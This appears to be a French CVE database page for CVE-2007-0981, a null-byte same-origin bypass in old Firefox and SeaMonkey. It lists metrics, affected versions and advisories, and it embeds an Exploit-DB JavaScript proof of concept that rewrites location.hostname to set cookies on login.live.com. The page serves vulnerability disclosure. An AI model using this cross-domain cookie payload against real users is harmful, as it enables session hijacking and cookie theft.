CVE-2007-0981 : Détail

CVE-2007-0981

A01-Broken Access Control
96.94%V3
Network
2007-02-16
00h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Mozilla based browsers, including Firefox before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8, allow remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3340

Date de publication : 2007-02-19 23h00 +00:00
Auteur : Michal Zalewski
EDB Vérifié : Yes

<!-- ________________________________________________________________________________ Mozilla Firefox 'location.hostname' Cross-Domain Vulnerability ________________________________________________________________________________ Software : Mozilla Firefox version 2.0.0.1 and prior CVE reference : CVE-2007-0981 Impact : Security Bypass Risk : Moderate Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/) Advisory Date : 2007-02-15 Mozilla Firefox allows remote attackers to bypass the same origin policy, steal cookies, and conduct other attacks by writing a URI with a null byte to the hostname (location.hostname) DOM property, due to interactions with DNS resolver code. Links http://lcamtuf.dione.cc/ffhostname.html (test) https://bugzilla.mozilla.org/show_bug.cgi?id=370445 ________________________________________________________________________________ How To Test Your Browser ? 1 - Execute this on your local web server (or change variable 'mydomain') 2 - Go to the link 'http://login.live.com/' and read the login (or check Tools -> Options -> Privacy -> Show Cookies for login.live.com) ________________________________________________________________________________ Gorn, gorn.support[gmail]com 2007-02-19 16:00 --> <script language="javascript"> var mydomain = '127.0.0.1'; var var_cook = 'MSPPre=firefox_vulnerability_test'; var dom_cook = 'login.live.com'; if (location.hostname == mydomain) { try { location.hostname = mydomain + '\x00www.' + dom_cook; } catch (err) { alert('Failed to modify location.hostname'); } } else { document.cookie = var_cook + '; domain=.' + dom_cook + '; path=/;'; } </script> # milw0rm.com [2007-02-20]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version To (including) 1.5.0.9

Mozilla>>Firefox >> Version 0.8

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9

Mozilla>>Firefox >> Version 0.9.1

Mozilla>>Firefox >> Version 0.9.2

Mozilla>>Firefox >> Version 0.9.3

Mozilla>>Firefox >> Version 0.10

Mozilla>>Firefox >> Version 0.10.1

Mozilla>>Firefox >> Version 1.0

Mozilla>>Firefox >> Version 1.0.1

Mozilla>>Firefox >> Version 1.0.2

Mozilla>>Firefox >> Version 1.0.3

Mozilla>>Firefox >> Version 1.0.4

Mozilla>>Firefox >> Version 1.0.5

Mozilla>>Firefox >> Version 1.0.6

Mozilla>>Firefox >> Version 1.0.6

    Mozilla>>Firefox >> Version 1.0.7

    Mozilla>>Firefox >> Version 1.0.8

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5

    Mozilla>>Firefox >> Version 1.5.0.1

    Mozilla>>Firefox >> Version 1.5.0.2

    Mozilla>>Firefox >> Version 1.5.0.3

    Mozilla>>Firefox >> Version 1.5.0.4

    Mozilla>>Firefox >> Version 1.5.0.5

    Mozilla>>Firefox >> Version 1.5.0.6

    Mozilla>>Firefox >> Version 1.5.0.7

    Mozilla>>Firefox >> Version 1.5.0.8

    Mozilla>>Firefox >> Version 1.5.1

    Mozilla>>Firefox >> Version 1.5.2

    Mozilla>>Firefox >> Version 1.5.3

    Mozilla>>Firefox >> Version 1.5.4

    Mozilla>>Firefox >> Version 1.5.5

    Mozilla>>Firefox >> Version 1.5.6

    Mozilla>>Firefox >> Version 1.5.7

    Mozilla>>Firefox >> Version 1.5.8

    Mozilla>>Firefox >> Version 2.0

    Mozilla>>Firefox >> Version 2.0

      Mozilla>>Firefox >> Version 2.0

        Mozilla>>Firefox >> Version 2.0.0.1

        Mozilla>>Firefox >> Version preview_release

          Mozilla>>Seamonkey >> Version To (including) 1.0.7

          Mozilla>>Seamonkey >> Version 1.0

          Mozilla>>Seamonkey >> Version 1.0.1

          Mozilla>>Seamonkey >> Version 1.0.2

          Mozilla>>Seamonkey >> Version 1.0.3

          Mozilla>>Seamonkey >> Version 1.0.4

          Mozilla>>Seamonkey >> Version 1.0.5

          Mozilla>>Seamonkey >> Version 1.0.6

          Références

          http://www.redhat.com/support/errata/RHSA-2007-0078.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/24395
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.osvdb.org/32104
          Tags : vdb-entry, x_refsource_OSVDB
          http://secunia.com/advisories/24328
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.redhat.com/support/errata/RHSA-2007-0108.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://security.gentoo.org/glsa/glsa-200703-04.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://www.gentoo.org/security/en/glsa/glsa-200703-08.xml
          Tags : vendor-advisory, x_refsource_GENTOO
          http://secunia.com/advisories/24384
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24457
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24343
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.debian.org/security/2007/dsa-1336
          Tags : vendor-advisory, x_refsource_DEBIAN
          http://www.vupen.com/english/advisories/2007/0718
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.kb.cert.org/vuls/id/885753
          Tags : third-party-advisory, x_refsource_CERT-VN
          http://secunia.com/advisories/24650
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.ubuntu.com/usn/usn-428-1
          Tags : vendor-advisory, x_refsource_UBUNTU
          http://securityreason.com/securityalert/2262
          Tags : third-party-advisory, x_refsource_SREASON
          http://secunia.com/advisories/24320
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/25588
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.vupen.com/english/advisories/2008/0083
          Tags : vdb-entry, x_refsource_VUPEN
          http://secunia.com/advisories/24293
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24238
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24393
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24342
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24287
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://fedoranews.org/cms/node/2713
          Tags : vendor-advisory, x_refsource_FEDORA
          http://secunia.com/advisories/24175
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/bid/22566
          Tags : vdb-entry, x_refsource_BID
          http://www.redhat.com/support/errata/RHSA-2007-0097.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://fedoranews.org/cms/node/2728
          Tags : vendor-advisory, x_refsource_FEDORA
          http://secunia.com/advisories/24205
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://secunia.com/advisories/24333
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.mandriva.com/security/advisories?name=MDKSA-2007:050
          Tags : vendor-advisory, x_refsource_MANDRIVA
          http://secunia.com/advisories/24290
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://securitytracker.com/id?1017654
          Tags : vdb-entry, x_refsource_SECTRACK
          http://secunia.com/advisories/24455
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://rhn.redhat.com/errata/RHSA-2007-0077.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://www.vupen.com/english/advisories/2007/0624
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.redhat.com/support/errata/RHSA-2007-0079.html
          Tags : vendor-advisory, x_refsource_REDHAT
          http://secunia.com/advisories/24437
          Tags : third-party-advisory, x_refsource_SECUNIA